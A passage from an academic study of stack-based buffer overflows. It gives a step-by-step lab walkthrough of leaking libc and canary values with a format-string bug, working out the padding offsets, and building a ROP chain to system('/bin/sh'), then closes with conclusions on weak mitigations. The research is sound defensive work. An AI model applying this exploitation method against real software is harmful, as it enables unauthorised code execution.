Phase 2: The next step is to utilize the leaked information to get the libc offset after randomization and Canary value. Since, format string output 3 represents a libc address, it can be used to find out the libc offset, for example we run our program in gdb and passed the output 3 of format string as an input, which gives a random libc address as shown in Figure 33. The vmmap command can be used to display the memory mapping of libc for the current process, also shown in Figure 33. The libc offset is obtained by getting the difference of libc address and starting address of memory mapping of libc as shown in Figure 33. The obtained offset could be subtracted from any libc address to get the base address of libc after randomization. The next step is to calculate the canary value.
When we disassemble our main() function in gdb, we can see, the canary is stored in RCX and is checked after the last fgets() is called as shown in Figure 33 (only required part of disassembly). Since, we also know that output 6 and 9 of format string might correspond to stack canary. We run our program in gdb and passed the output 9 of format string to program that returned a value. After that, we run our program with a break-point at 0x5555555551f9, checked the value of RCX, and compare the result of both format string value and RCX value, thus, found the original stack canary as shown in Figure 33.  Now, the next step is to determine our input string size to overwrite the stack canary and return address. To see after how many characters, canary should be placed, we create a pattern and pass it as input to our program in gdb. Using the RCX register's value, we can get the offset that will give us the number of A's to be filled before we overwrite the canary, and in our case, it is 24. After canary, there is rbp of 8 bytes. Since rip will be 8 bytes from rbp, we have to place 8 As before overwriting the return address.
Phase 3: The final step is to place ROP gadgets in the payload along with the previously found addresses. It means in our payload, we would add system() function and pass /bin/sh as an argument via "pop rdi; ret" gadget. We created a script file as shown in Figure 34, combining all the work explained above to get leaked addresses as highlighted in the figure, and finally sending this payload to our vulnerable program. Running that python script file will spawn a shell, also shown in Figure 34.

Conclusions
This study performs a detailed literature review of most prevailing attack Buffer Overflow special type Stack-based BF. There are number of attacks that can made using stack-based BF such as Stack smashing using code-injection method. To avoid this NX bits are introduced in memory region but still attackers found a way around. For this attackers Return-oriented Programming (ROP) is adapted that is an advance form of code-reuse attacks that could easily bypass the NX bit by making use of ROP gadgets already present in the address space of process. ASLR randomizes the base addresses of stack, heap, shared libraries and binaries to protect against ROP attacks. However, a single bit of information leakage is enough to bypass ASLR. PIE and RELRO are used to harden binaries against information leakage and ROP attacks but they can also be bypassed as we have done in the current study. Stack canary is a robust protection mechanism that protects from typical stack smashing attacks. NX bit, ASLR, PIE, RELRO, and Stack Canary are well-known mitigation techniques used by many famous operating systems. Unfortunately, after passing so many years, these mitigation's are not completely foolproof and can still be bypassed with a bit of effort. It is the main cause, which makes buffer overflow an ever-present threat.
There are various points that requires the attention from developer community and one of them is the advanced exploitation methods, for example the exploits used in the current study are customized and valid for a single instance of the vulnerable program. Thus, there is a need to focus on more advanced exploitation methods, such Blind ROP (BROP). Another direction is to make existing mitigation techniques mature enough or proposed a new mitigation technique better than existing mitigation. There are various automated tools exist, that are used for automatic detection and prevention of buffer overflow but still an optimal approach is missing. Funding: Authors are especially thankful to Prince Sultan University for paying the Article Processing Charges (APC) of this publication.